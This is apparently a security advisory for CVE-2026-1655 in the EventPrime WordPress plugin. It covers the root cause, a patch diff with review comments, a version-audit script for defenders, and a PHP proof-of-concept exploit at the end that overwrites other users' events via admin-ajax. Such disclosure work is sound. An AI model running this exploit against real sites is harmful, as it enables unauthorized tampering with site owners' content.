Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1655: EventPrime <= 4.2.8.4 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Event Modification via 'event_id' Parameter (eventprime-event-calendar-management)

CVE ID CVE-2026-1655
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 4.2.8.4
Patched Version 4.2.8.5
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1655:
This vulnerability is a missing authorization flaw in the EventPrime WordPress plugin, allowing authenticated users with the Subscriber role or higher to arbitrarily modify events created by other users, including administrators. The vulnerability exists in the frontend event submission functionality and has a CVSS score of 4.3.

Root Cause:
The vulnerability originates in the `save_frontend_event_submission` function within the `class-ep-ajax.php` file. In versions up to 4.2.8.4, the function accepted a user-controlled `event_id` parameter via the `$data` array and performed a `wp_update_post()` operation without proper ownership verification. The only check present was for guest submissions (`get_post_meta($post_id, 'em_user_submitted', true) != get_current_user_id()`), which did not validate the post author or check WordPress capabilities for authenticated users. The vulnerable code path begins at line 891 where `$data['event_id']` is processed.

Exploitation:
An attacker with at least Subscriber-level access must obtain a valid nonce for the frontend event submission action. They then send a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `save_frontend_event_submission`. The request includes the target `event_id` parameter pointing to an event they do not own, along with other event data fields like `em_name` and `em_descriptions`. The plugin processes this request through the vulnerable function, updating the target event post without authorization checks.

Patch Analysis:
The patch in version 4.2.8.5 adds comprehensive authorization checks before allowing event updates. The fix introduces three validation steps: it retrieves the current user ID, the post author ID via `get_post_field('post_author', $post_id)`, and the submitted user ID from post meta (`em_user`). It then checks if the current user can edit the post using `current_user_can('edit_post', $post_id)`, or if the current user matches either the post author or the submitted user. Only if one of these conditions is true (`$can_edit`) does the update proceed. The patch also adds `absint()` sanitization to the `event_id` parameter.
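As a defender-side check for the patch described above (an added example, not Atomic Edge's or EventPrime's code): the script audits a wp-content/plugins directory, reads the plugin's Version: header, compares it numerically against 4.2.8.5, and confirms that the two lines the patch adds ahead of wp_update_post() are present in class-ep-ajax.php. It assumes the plugin layout named in the diff on this page; the sample plugin trees it writes are constructed for the demonstration.

```python
"""Audit a WordPress wp-content/plugins tree for CVE-2026-1655 (EventPrime <= 4.2.8.4)."""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

PLUGIN_DIR = "eventprime-event-calendar-management"   # plugin slug from the advisory
PLUGIN_MAIN = "event-prime.php"                        # file carrying the 'Version:' header
AJAX_FILE = "includes/class-ep-ajax.php"               # holds save_frontend_event_submission
PATCHED_VERSION = "4.2.8.5"
# Lines the 4.2.8.5 diff adds before wp_update_post(); their absence is a version-independent signal.
PATCH_MARKERS = (
    "absint( $data['event_id'] )",
    "current_user_can( 'edit_post', $post_id )",
)

def parse_version(text: str) -> tuple[int, ...]:
    """'4.2.8.4' -> (4, 2, 8, 4), so that 4.2.10 sorts after 4.2.9 (a string compare would not)."""
    return tuple(int(p) for p in re.findall(r"\d+", text))

def plugin_version(main_file: Path) -> str | None:
    """Read the 'Version:' field from the WordPress plugin header comment."""
    if not main_file.is_file():
        return None
    head = main_file.read_text(encoding="utf-8", errors="replace")[:8192]
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", head, re.MULTILINE)
    return m.group(1) if m else None

def audit_plugins_dir(plugins_root: str | Path) -> dict:
    """Return installed/version/vulnerable verdicts for one plugins directory."""
    root = Path(plugins_root) / PLUGIN_DIR
    result = {"installed": root.is_dir(), "version": None,
              "patch_markers_present": None, "vulnerable": None}
    if not result["installed"]:
        return result
    result["version"] = plugin_version(root / PLUGIN_MAIN)
    ajax = root / AJAX_FILE
    if ajax.is_file():
        src = ajax.read_text(encoding="utf-8", errors="replace")
        result["patch_markers_present"] = all(m in src for m in PATCH_MARKERS)
    if result["version"] is not None:
        result["vulnerable"] = parse_version(result["version"]) < parse_version(PATCHED_VERSION)
    if result["patch_markers_present"] is False:
        # Source check wins: a header claiming 4.2.8.5 without the checks is still exposed.
        result["vulnerable"] = True
    return result

def write_sample_install(plugins_root: Path, version: str, patched_code: bool) -> None:
    """Write a constructed, minimal plugin tree (not the real plugin files) for the demo."""
    root = plugins_root / PLUGIN_DIR
    (root / "includes").mkdir(parents=True, exist_ok=True)
    (root / PLUGIN_MAIN).write_text(
        f"<?php\n/**\n * Plugin Name:       EventPrime\n * Version:           {version}\n */\n",
        encoding="utf-8")
    body = ("$post_id = absint( $data['event_id'] );\n"
            "$can_edit = current_user_can( 'edit_post', $post_id );\n"
            if patched_code else "$post_id = $data['event_id'];\n")
    (root / AJAX_FILE).write_text("<?php\n" + body, encoding="utf-8")

def demo() -> dict:
    """Audit one constructed vulnerable and one constructed patched install."""
    verdicts = {}
    with tempfile.TemporaryDirectory() as tmp:
        for label, version, patched in (("vulnerable", "4.2.8.4", False),
                                        ("patched", "4.2.8.5", True)):
            plugins_root = Path(tmp) / label / "wp-content" / "plugins"
            write_sample_install(plugins_root, version, patched)
            verdicts[label] = audit_plugins_dir(plugins_root)
    return verdicts
```

Point `audit_plugins_dir()` at a real site's wp-content/plugins directory to get the same verdict dictionary for that install.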

Impact:
Successful exploitation allows authenticated attackers to modify any event within the WordPress site, regardless of ownership. This can lead to defacement, data integrity issues, and disruption of event management. Attackers could alter event titles, descriptions, dates, or other metadata, potentially causing operational and reputational damage. The vulnerability does not grant direct administrative privileges but enables unauthorized modification of content typically restricted to event owners or administrators.

Differential between vulnerable and patched code

Code Diff
--- a/eventprime-event-calendar-management/event-prime.php
+++ b/eventprime-event-calendar-management/event-prime.php
@@ -16,7 +16,7 @@
  * Plugin Name:       EventPrime – Modern Events Calendar, Bookings and Tickets
  * Plugin URI:        https://theeventprime.com
  * Description:       Beginner-friendly Events Calendar plugin to create free as well as paid Events. Includes Event Types, Event Sites & Performers too.
- * Version:           4.2.8.4
+ * Version:           4.2.8.5
  * Author:            EventPrime Event Calendar
  * Author URI:        https://theeventprime.com/
  * License:           GPL-2.0+
@@ -35,7 +35,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'EVENTPRIME_VERSION', '4.2.8.4' );
+define( 'EVENTPRIME_VERSION', '4.2.8.5' );
 define('EM_DB_VERSION',4.0);
 if( ! defined( 'EP_PLUGIN_FILE' ) ) {
     define( 'EP_PLUGIN_FILE', __FILE__ );
--- a/eventprime-event-calendar-management/includes/class-ep-ajax.php
+++ b/eventprime-event-calendar-management/includes/class-ep-ajax.php
@@ -891,18 +891,23 @@

             $event_description = wp_kses_post( stripslashes( $data['em_descriptions'] ) );

-            if( isset( $data['event_id'] ) && ! empty( $data['event_id'] ) ) {
-                $post_id = $data['event_id'];
-                if(empty(get_post($post_id)) || get_post_type($post_id) != 'em_event' ){
-                    wp_send_json_error( array( 'error' => esc_html__( 'There is some issue with event. Please try later.', 'eventprime-event-calendar-management' ) ) );
-                }
-                if(!empty($guest_submission) && get_post_meta($post_id, 'em_user_submitted', true) != get_current_user_id()){
-                       wp_send_json_error( array( 'error' => esc_html__( 'Event does not belong to you.', 'eventprime-event-calendar-management' ) ) );
-
-                }
-                $post_update = array(
-                    'ID'         => $post_id,
-                    'post_title' => $em_name,
+            if( isset( $data['event_id'] ) && ! empty( $data['event_id'] ) ) {
+                $post_id = absint( $data['event_id'] );
+                if(empty(get_post($post_id)) || get_post_type($post_id) != 'em_event' ){
+                    wp_send_json_error( array( 'error' => esc_html__( 'There is some issue with event. Please try later.', 'eventprime-event-calendar-management' ) ) );
+                }
+                $current_user_id = get_current_user_id();
+                $post_author_id = (int) get_post_field( 'post_author', $post_id );
+                $submitted_user_id = (int) get_post_meta( $post_id, 'em_user', true );
+                $can_edit = current_user_can( 'edit_post', $post_id )
+                    || ( $current_user_id > 0 && $post_author_id === $current_user_id )
+                    || ( $current_user_id > 0 && $submitted_user_id === $current_user_id );
+                if ( ! $can_edit ) {
+                    wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to edit this event.', 'eventprime-event-calendar-management' ) ) );
+                }
+                $post_update = array(
+                    'ID'         => $post_id,
+                    'post_title' => $em_name,
                     'post_content' => $event_description,
                 );
                 wp_update_post( $post_update );
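Review bot: the `$current_user_id > 0` guards in the `$can_edit` expression are load-bearing and must survive any refactor: `(int) get_post_meta( $post_id, 'em_user', true )` yields 0 when the meta is absent, so without the guard a request with user ID 0 would satisfy `$submitted_user_id === $current_user_id`. Two further points: the `$post_author_id === $current_user_id` branch grants edit rights to a Subscriber who authored the event even though `current_user_can( 'edit_post', $post_id )` denies that role, which is presumably intended for frontend submissions but deserves an inline comment; and the hunk shows no nonce or `is_user_logged_in()` check ahead of this block, so confirm the caller verifies the `security` nonce that the analysis above says is required before this code is reached.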
@@ -1759,45 +1764,59 @@
     }


-    public function upload_file_media(){
-        if(isset($_FILES["file"]) && !empty($_FILES["file"])){
-            $extension = pathinfo( $_FILES["file"]["name"], PATHINFO_EXTENSION );
-            if( $extension != 'jpg' && $extension != 'jpeg' && $extension != 'png' && $extension != 'gif' ) {
-                wp_send_json_error( array( 'errors' => array( 'Only Image File Allowed.' ) ) );
-            }
-            $file = $_FILES['file'];
-            $filename = $file['name'];
-            $tmp_name = $file['tmp_name'];
-            $upload_dir = wp_upload_dir();
-            if (move_uploaded_file($file["tmp_name"], $upload_dir['path'] . "/" . $filename)) {
-                $uploaded_file['file_name'] = $filename;
-                $uploaded_file['upload_url'] = $upload_dir['url'] . "/" . $filename;
-                $wp_filetype = wp_check_filetype($filename, null );
-                $attachment = array(
-                    'guid'           => $uploaded_file['upload_url'],
-                    'post_mime_type' => $wp_filetype['type'],
-                    'post_title'     => preg_replace( '/.[^.]+$/', '', $filename ),
-                    'post_content'   => '',
-                    'post_status'    => 'inherit'
-                );
-                $attachment_id = wp_insert_attachment( $attachment, $upload_dir['path'] . "/" . $filename );
-                if ( ! is_wp_error( $attachment_id ) ) {
-                    require_once(ABSPATH . "wp-admin" . '/includes/file.php');
-                    $attachment_data = wp_generate_attachment_metadata( $attachment_id, $upload_dir['path'] . "/" . $filename );
-                    wp_update_attachment_metadata( $attachment_id,  $attachment_data );
-                    $returnData['success'] = array( 'attachment_id' => $attachment_id );
-                }
-            }
-            else{
-                $returnData['errors'] = __($upload_file['error']);
-            }
-        }
-        if( isset( $returnData['success'] ) ) {
-            wp_send_json_success( $returnData['success'] );
-        }else{
-            wp_send_json_success( $returnData );
-        }
-    }
+    public function upload_file_media(){
+        if ( ! isset( $_POST['security'] ) || ! wp_verify_nonce( $_POST['security'], 'ep-frontend-event-submission-nonce' ) ) {
+            wp_send_json_error( array( 'errors' => array( esc_html__( 'Security check failed.', 'eventprime-event-calendar-management' ) ) ) );
+        }
+
+        if ( empty( $_FILES['file'] ) || empty( $_FILES['file']['name'] ) ) {
+            wp_send_json_error( array( 'errors' => array( esc_html__( 'No file provided.', 'eventprime-event-calendar-management' ) ) ) );
+        }
+
+        $file = $_FILES['file'];
+        $allowed_mimes = array(
+            'jpg|jpeg|jpe' => 'image/jpeg',
+            'png'          => 'image/png',
+            'gif'          => 'image/gif',
+        );
+        $filecheck = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed_mimes );
+        if ( empty( $filecheck['ext'] ) || empty( $filecheck['type'] ) ) {
+            wp_send_json_error( array( 'errors' => array( esc_html__( 'Only image files are allowed.', 'eventprime-event-calendar-management' ) ) ) );
+        }
+
+        require_once( ABSPATH . 'wp-admin/includes/file.php' );
+        require_once( ABSPATH . 'wp-admin/includes/image.php' );
+
+        $upload_overrides = array(
+            'test_form' => false,
+            'mimes'     => $allowed_mimes,
+        );
+        $uploaded = wp_handle_upload( $file, $upload_overrides );
+        if ( isset( $uploaded['error'] ) ) {
+            wp_send_json_error( array( 'errors' => array( $uploaded['error'] ) ) );
+        }
+
+        $safe_name = sanitize_file_name( $file['name'] );
+        $attachment = array(
+            'guid'           => $uploaded['url'],
+            'post_mime_type' => $filecheck['type'],
+            'post_title'     => preg_replace( '/.[^.]+$/', '', $safe_name ),
+            'post_content'   => '',
+            'post_status'    => 'inherit'
+        );
+        $attachment_id = wp_insert_attachment( $attachment, $uploaded['file'] );
+        if ( ! is_wp_error( $attachment_id ) ) {
+            $attachment_data = wp_generate_attachment_metadata( $attachment_id, $uploaded['file'] );
+            wp_update_attachment_metadata( $attachment_id, $attachment_data );
+            $returnData['success'] = array( 'attachment_id' => $attachment_id );
+        }
+
+        if ( isset( $returnData['success'] ) ) {
+            wp_send_json_success( $returnData['success'] );
+        } else {
+            wp_send_json_success( $returnData );
+        }
+    }


     public function booking_update_status(){
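Review bot: the failure path after `wp_insert_attachment()` is still reported as success: when `is_wp_error( $attachment_id )` is true, `$returnData` is never initialised and the function falls through to `wp_send_json_success( $returnData )` with a null payload. Initialise `$returnData = array();` at the top and call `wp_send_json_error()` on that branch. The new nonce check proves the request came from the form, not that the user is allowed to upload; add `is_user_logged_in()` or `current_user_can( 'upload_files' )` as the guest-submission policy requires. Finally, `$_POST['security']` should go through `wp_unslash()` and `sanitize_text_field()` before `wp_verify_nonce()`, per WordPress coding standards.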
--- a/eventprime-event-calendar-management/includes/class-eventprime-event-calendar-management.php
+++ b/eventprime-event-calendar-management/includes/class-eventprime-event-calendar-management.php
@@ -374,11 +374,11 @@
                 $this->loader->add_filter( 'handle_bulk_actions-edit-em_booking', $plugin_admin, 'ep_export_booking_bulk_action_handle', 10, 3 );

                 $this->loader->add_action( 'admin_head-edit.php',$plugin_admin, 'ep_add_booking_export_btn');
-                $this->loader->add_action( 'before_delete_post', $plugin_admin, 'ep_before_delete_event_bookings', 99, 2 );
-
-                $this->loader->add_action( 'save_post', $plugin_admin, 'ep_save_event_meta_boxes', 1, 2 );
-                $this->loader->add_filter( 'wp_insert_post_data', $plugin_admin, 'ep_respect_requested_post_status', 10, 2 );
-                $this->loader->add_filter( 'manage_em_event_posts_columns', $plugin_admin, 'ep_filter_event_columns'  );
+                $this->loader->add_action( 'before_delete_post', $plugin_admin, 'ep_before_delete_event_bookings', 99, 2 );
+
+                $this->loader->add_action( 'save_post', $plugin_admin, 'ep_save_event_meta_boxes', 1, 2 );
+                $this->loader->add_filter( 'wp_insert_post_data', $plugin_admin, 'ep_respect_requested_post_status', 10, 2 );
+                $this->loader->add_filter( 'manage_em_event_posts_columns', $plugin_admin, 'ep_filter_event_columns'  );
 		$this->loader->add_action( 'manage_em_event_posts_custom_column', $plugin_admin, 'ep_filter_event_columns_content', 10, 2 );
 		$this->loader->add_filter( 'manage_edit-em_event_sortable_columns',$plugin_admin, 'ep_sortable_event_columns', 10, 1 );
 		$this->loader->add_action( 'pre_get_posts',  $plugin_admin, 'ep_sort_events_date' , 10, 1 );
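Review bot: the five removed and re-added `add_action`/`add_filter` lines are identical apart from whitespace or line endings, so this hunk is formatting churn with no functional change; keeping such normalisation out of a security release makes the actual fix easier to audit.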
@@ -665,4 +665,4 @@
 		}
 	}

-}
+}
--- a/eventprime-event-calendar-management/includes/class-eventprime-functions.php
+++ b/eventprime-event-calendar-management/includes/class-eventprime-functions.php
@@ -141,15 +141,27 @@
                 $url = add_query_arg($slug, $id, $url);
             }
             $enable_seo_urls = $this->ep_get_global_settings('enable_seo_urls');
-            if (!empty($enable_seo_urls) && !empty($permalink)) {
-                $url = get_permalink($id);
-                if ($type == 'term') {
-                    if (empty($taxonomy)) {
-                        $taxonomy = get_term($id)->taxonomy;
-                    }
-                    $url = get_term_link($id, $taxonomy);
-                }
-            }
+            if (!empty($enable_seo_urls) && !empty($permalink)) {
+                $url = get_permalink($id);
+                if ($type == 'term') {
+                    $term = null;
+                    if (empty($taxonomy)) {
+                        $term = get_term($id);
+                        if (!is_wp_error($term) && $term && !empty($term->taxonomy)) {
+                            $taxonomy = $term->taxonomy;
+                        }
+                    }
+                    if (empty($term)) {
+                        $term = get_term($id, $taxonomy);
+                    }
+                    if (!is_wp_error($term) && $term && !empty($term->term_id)) {
+                        $term_link = get_term_link($term);
+                        if (!is_wp_error($term_link)) {
+                            $url = $term_link;
+                        }
+                    }
+                }
+            }
         }
         return $url;
     }
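Review bot: the fallback when term-link resolution fails is wrong for terms: `$url = get_permalink($id);` runs before the `if ($type == 'term')` branch, so if `get_term()` or `get_term_link()` returns a `WP_Error` the function returns the permalink of whichever post happens to have ID `$id` (or `false`), not an event-type URL. Keep the query-arg URL built by `add_query_arg($slug, $id, $url)` above as the fallback, for example by assigning `get_permalink($id)` only in the non-term case, and check `get_permalink()` for `false` as well.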
@@ -14018,6 +14030,13 @@
             'done'           => true,
         );
     }
+
+    public function get_event_id_from_ticket_id($ticket_id)
+    {
+        $DBhandler = new EP_DBhandler();
+        $event_id = $DBhandler->get_value('TICKET','event_id', $ticket_id);
+        return $event_id;
+    }


 }
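Review bot: `get_event_id_from_ticket_id()` forwards `$ticket_id` to `$DBhandler->get_value('TICKET', 'event_id', $ticket_id)` without casting or a docblock; unless `get_value()` prepares its query (not visible here), cast with `absint( $ticket_id )` at this boundary, return an explicit 0 or null when no row matches, and document the return type, since callers will likely pass the result straight into `get_post()`.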
--- a/eventprime-event-calendar-management/public/partials/eventprime-event-type.php
+++ b/eventprime-event-calendar-management/public/partials/eventprime-event-type.php
@@ -11,6 +11,7 @@
 }
         $event_type_id            = absint( $atts['id'] );
         $term                     = get_term( $event_type_id );
+        $event_types_data         = array();
         if( ! empty( $term ) ) {
             wp_enqueue_script(
                 'ep-eventtypes-details',
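Review bot: hoisting `$event_types_data = array();` above the `if` fixes an undefined-variable notice on the later `(object)$event_types_data` cast when the term lookup fails, but `! empty( $term )` still lets a `WP_Error` through, because a `WP_Error` object is non-empty; add `! is_wp_error( $term )` to that condition, as the calendar.php hunks below do.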
@@ -26,7 +27,7 @@
                 )
             );

-            $event_types_data         = array();
+
             $event_types_data['term'] = $term;
             $event_types_data['event_type'] = $ep_functions->get_single_event_type( $term->term_id );
             // upcoming events
@@ -86,6 +87,7 @@
             plugin_dir_url( EP_PLUGIN_FILE ) . 'public/css/ep-frontend-views.css',
             false, EVENTPRIME_VERSION
         );
+        //var_dump($event_type_data);die;
         $args = (object)$event_types_data;
 ?>
 <div class="emagic">
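Review bot: `//var_dump($event_type_data);die;` is leftover debugging and refers to `$event_type_data`, which does not exist (the variable is `$event_types_data`); remove it rather than shipping it commented out.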
--- a/eventprime-event-calendar-management/public/partials/themes/default/events/views/calendar.php
+++ b/eventprime-event-calendar-management/public/partials/themes/default/events/views/calendar.php
@@ -28,12 +28,21 @@
             <div class="ep-event-type ep-event-type ep-mr-2 ep-border ep-p-2 ep-rounded-1 ep-lh-0 ep-di-flex ep-align-items-center ep-mb-2">
                 <?php
                 $type_id = (int)trim($type_id);
+                $type = get_term( $type_id );
+                if ( is_wp_error( $type ) || ! $type  || empty( $type->term_id ) ) {
+                    continue;
+                }
+
                 $type_url = $ep_functions->ep_get_custom_page_url( 'event_types', $type_id, 'event_type', 'term' );
                 $enable_seo_urls = $ep_functions->ep_get_global_settings( 'enable_seo_urls' );
-                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) ){
-                    $type_url = get_term_link( $type_id );
+                $permalink_structure = get_option( 'permalink_structure' );
+                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) && ! empty( $permalink_structure ) ){
+                    $term_link = get_term_link( $type ); // pass term object is safer
+                    if ( ! is_wp_error( $term_link ) ) {
+                        $type_url = $term_link;
+                    }
                 }
-                $type = get_term( $type_id );
+
                 $type_color = get_term_meta( $type->term_id, 'em_color', true );
                 ?>
                 <a class="ep-outline-width-0" href="<?php echo esc_url( $type_url ); ?>"><?php echo esc_html( $type->name ); ?></a><?php
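Review bot: the new `continue` on an invalid term fires after the enclosing `<div class="ep-event-type ...">` has already been emitted, so every skipped type leaves an unclosed `<div>` in the calendar markup. Resolve the term and `continue` before the opening tag, or close the div before skipping. Removing the later `$type = get_term( $type_id );` is correct now that `$type` is resolved up front.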
@@ -49,9 +58,16 @@
                 <?php
                 $type_url = $ep_functions->ep_get_custom_page_url( 'event_types', $type['id'], 'event_type', 'term' );
                 $enable_seo_urls = $ep_functions->ep_get_global_settings( 'enable_seo_urls' );
-                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) ){
-                    $type_url = get_term_link( $type['id'] );
-                }?>
+                $permalink_structure = get_option( 'permalink_structure' );
+                if( isset( $enable_seo_urls ) && ! empty( $enable_seo_urls ) && ! empty( $permalink_structure ) ){
+                    $term_link = get_term_link( $type['id'] ); // pass term object is safer
+                    if ( ! is_wp_error( $term_link ) ) {
+                        $type_url = $term_link;
+                    }
+                }
+
+
+                ?>
                 <a class="ep-outline-width-0" href="<?php echo esc_url( $type_url ); ?>"><?php echo esc_html( $type['name'] ); ?></a><?php
                 if( ! empty( $type['em_color'] ) && $type['em_color'] != '#' ) {?>
                     <span style="background-color:<?php echo esc_attr( $type['em_color'] ); ?>" class="ep-ml-1"></span><?php
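Review bot: the comment `// pass term object is safer` is misleading here, because `get_term_link( $type['id'] )` receives an integer, not a term object; either pass a term object (as the previous hunk does) or drop the comment. Unlike the hunk above, this block does not validate the term before building the link, although the `is_wp_error` check on the result covers the failure case.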

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1655 - EventPrime <= 4.2.8.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Event Modification via 'event_id' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-1655
 * Requires: Valid WordPress subscriber (or higher) credentials and a valid nonce
 * Target: WordPress site with EventPrime plugin <= 4.2.8.4
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$username = 'attacker'; // CHANGE THIS
$password = 'password'; // CHANGE THIS
$target_event_id = 123; // CHANGE THIS - ID of event to modify
$new_event_title = 'Hacked Event Title'; // CHANGE THIS

// Step 1: Authenticate and obtain cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Extract nonce from frontend event submission form
// Note: The nonce is typically available on event creation/edit pages
// This step requires visiting a page that contains the nonce
$event_creation_url = $target_url . '/events/'; // Adjust path as needed
curl_setopt($ch, CURLOPT_URL, $event_creation_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation depends on page structure)
// The nonce is typically in a meta tag or JavaScript variable
// For this PoC, we assume you've manually obtained the nonce
$nonce = 'YOUR_VALID_NONCE_HERE'; // CHANGE THIS - Obtain from page source

// Step 3: Exploit the vulnerability
$post_data = [
    'action' => 'save_frontend_event_submission',
    'event_id' => $target_event_id,
    'em_name' => $new_event_title,
    'em_descriptions' => 'Modified by attacker',
    'security' => $nonce, // Required nonce for the action
    // Include other required fields as per the form
    'em_start_date' => date('Y-m-d'),
    'em_end_date' => date('Y-m-d'),
    'em_start_time' => '10:00',
    'em_end_time' => '12:00'
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);

// Check response
if (strpos($response, 'success') !== false) {
    echo "[+] Event successfully modified!\n";
    echo "Response: " . $response . "\n";
} else {
    echo "[-] Exploit failed. Response: " . $response . "\n";
}

curl_close($ch);
?>
